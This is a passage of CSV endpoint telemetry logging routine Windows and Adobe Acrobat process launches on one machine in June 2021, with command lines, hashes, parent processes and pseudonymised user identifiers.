System,10.0.19041.1023,MusNotificationUx.exe,MusNotificationUx.exe,MusNotificationUx.exe
+292,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:53:43.436136600+00:00,3580,dllhost.exe,DllHost.exe /Processid:{AA65DD7C-83AC-48C0-A6FD-9B61FEBF8800},PortableExecutable,2020-10-09 20:47:24.152425900+00:00,C:\Windows\System32\dllhost.exe,21312,08eb78e5be019df044c26b14703bd1fa,e7fc40b41aa8b83841a0b96d169eaf0800aa784733e636935374d56536253f10,2ce12a317bebf8293f3544433a55d972a5967996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:43.494072100+00:00,2021-06-23 00:54:55.393047400+00:00,92b676f0-6f47-47c1-91f2-1138586ca74d,computerpii_0a470890c60768167990033d701e7bd881398861,155345,False,10.7740.19041.1052,False,11540474045136908,,11540474045171942,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
+293,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:45.600793700+00:00,13968,FullTrustNotifier.exe,"""FullTrustNotifier.exe"" GetChannelUri",PortableExecutable,2020-10-22 07:42:28+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\FullTrustNotifier.exe,218608,5236a3cd1fc50ea204f57c9f66787dc6,79f2749d62da14edd4b797d0af539e996841c237795932c299b847bb7d2cd159,ba01717f097852cd19729f5e3146076d12bcc5c7,77b989aab779490036bd3e4726bbef86,59c90ae4846f8e491c2a5aca0ac32e17e275a7f5beb5e3ac7aa09546e760cc45,77e0aac688d8e540f63fd490473b2570587a5ba4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:40.411672900+00:00,20344,AdobeCollabSync.exe,"""AdobeCollabSync.exe""  --type=collab-renderer --proc=3584",False,2021-06-23 00:51:40.351037500+00:00,3584,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:45.780330400+00:00,2021-06-23 00:54:55.394173300+00:00,02fe2fed-34f4-4e34-a2c8-3f9fb8b52b57,computerpii_0a470890c60768167990033d701e7bd881398861,155367,False,10.7740.19041.1052,False,11540474045171820,,11540474045171944,2021-06-23 00:51:40.411672900+00:00,20344,2021-06-23 00:51:40.411672900+00:00,AdobeCollabSync.exe,20344,256,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,5549280,2021-05-28 03:22:03+00:00,2021-05-28 05:59:00+00:00,2021-06-23 00:51:40.344784400+00:00,2021-05-28 05:59:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+294,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:45.755505700+00:00,18308,wuapihost.exe,wuapihost.exe -Embedding,PortableExecutable,2019-12-07 09:08:33.275369400+00:00,C:\Windows\System32\wuapihost.exe,11264,9e41b17e9be29c963e8ae84d42bceb45,ba77d5ebacbad0939b9ee667c59bcb7143a432be91522f4397d458e62f03eedd,9d37f7356576b1d8697fd790c18f278871ecc164,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:45.784265200+00:00,2021-06-23 00:54:55.394218500+00:00,fd18c375-63b4-4f43-8a6f-cceae3804d6b,computerpii_0a470890c60768167990033d701e7bd881398861,155368,False,10.7740.19041.1052,False,11540474045136908,,11540474045171945,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,wuapihost,wuapihost.exe,wuapihost
+295,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:45.772294100+00:00,6296,AcrobatNotificationClient.exe,"""AcrobatNotificationClient.exe"" -ServerName:App.AppXj7d2pwbjt1by8j1s5wak729xa46cf4br.mca",PortableExecutable,2020-11-11 08:07:18.989716+00:00,C:\Program Files\WindowsApps\AcrobatNotificationClient_1.0.4.0_x86__e1rzdqpraam7r\AcrobatNotificationClient.exe,436744,7891b28b113d62e7e37907c2d6e3ef46,814f6df432e48e05efa6b2cd099cffeb727703f6d908a1089b3e11dc05e47c32,4d11fe2f0cd15c15eed3650941bd718ace64c289,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:45.785906600+00:00,2021-06-23 00:54:55.394262+00:00,5379b9c9-6718-4c55-9728-a8dca11b4a6c,computerpii_0a470890c60768167990033d701e7bd881398861,155369,False,10.7740.19041.1052,False,11540474045136908,,11540474045171946,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,,,,,,
+296,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:46.067997500+00:00,8868,Acrobat.exe,"""Acrobat.exe"" /l /act",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,77b989aab779490036bd3e4726bbef86,59c90ae4846f8e491c2a5aca0ac32e17e275a7f5beb5e3ac7aa09546e760cc45,77e0aac688d8e540f63fd490473b2570587a5ba4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:40.351037500+00:00,3584,AdobeCollabSync.exe,"""AdobeCollabSync.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:46.243233800+00:00,2021-06-23 00:54:55.394828800+00:00,3ad11f44-61ef-4b16-b454-992cdbdf7984,computerpii_0a470890c60768167990033d701e7bd881398861,155382,False,10.7740.19041.1052,False,11540474045171819,,11540474045171947,2021-06-23 00:51:40.351037500+00:00,3584,2021-06-23 00:51:40.351037500+00:00,AdobeCollabSync.exe,3584,256,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,5549280,2021-05-28 03:22:03+00:00,2021-05-28 05:59:00+00:00,2021-06-23 00:51:40.344784400+00:00,2021-05-28 05:59:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+297,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:46.216430300+00:00,16140,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_menpzb 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:46.249172900+00:00,2021-06-23 00:54:55.394871900+00:00,209f8993-7021-4c08-8bfa-6b647241e02a,computerpii_0a470890c60768167990033d701e7bd881398861,155383,False,10.7740.19041.1052,False,11540474045136991,,11540474045171948,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+298,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:46.228206200+00:00,17492,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:53:46.216430300+00:00,16140,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_menpzb 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:46.249663700+00:00,2021-06-23 00:54:55.394915200+00:00,5c67ecc0-7430-45aa-890e-39d80d5da039,computerpii_0a470890c60768167990033d701e7bd881398861,155384,False,10.7740.19041.1052,False,11540474045171948,,11540474045171949,2021-06-23 00:53:46.216430300+00:00,16140,2021-06-23 00:53:46.216430300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,16140,16512,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-23 00:53:46.229988300+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+299,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 00:53:46.955303500+00:00,19264,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe626_ Global\UsGthrCtrlFltPipeMssGthrPipe626 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:46.970817+00:00,2021-06-23 00:54:55.395141+00:00,111f0891-56bf-40ad-adfb-c708423e0742,computerpii_0a470890c60768167990033d701e7bd881398861,155389,False,10.7740.19041.1052,False,11540474045144190,,11540474045171950,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+300,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:47.229405100+00:00,18680,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_tyoevq 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:47.263047100+00:00,2021-06-23 00:54:55.395378900+00:00,c86960b8-56b0-4c67-85ff-f3ceec899249,computerpii_0a470890c60768167990033d701e7bd881398861,155392,False,10.7740.19041.1052,False,11540474045136991,,11540474045171951,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,2176,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+301,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:47.229742100+00:00,7708,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_phqdsc 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:47.263737+00:00,2021-06-23 00:54:55.395459700+00:00,fdf92b68-a1f3-485e-9077-fab7213fb0f4,computerpii_0a470890c60768167990033d701e7bd881398861,155393,False,10.7740.19041.1052,False,11540474045136991,,11540474045171952,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,2176,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+302,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 00:53:47.235286100+00:00,9888,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:53:47.229405100+00:00,18680,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_tyoevq 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 00:53:47.264508900+00:00,2021-06-23 00:54:55.395540300+00:00,e7ce11fc-7b25-4c26-8ef0-e6c4ecd26d6e,computerpii_0a470890c60768167990033d701e7bd881398861,155394,False,10.7740.19041.1052,False,11540474045171951,,11540474045171953,2021-06-23 00:53:47.229405100+00:00,18680,2021-06-23 00:53:47.229405100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,18680,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-23 00:53:46.229988300+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
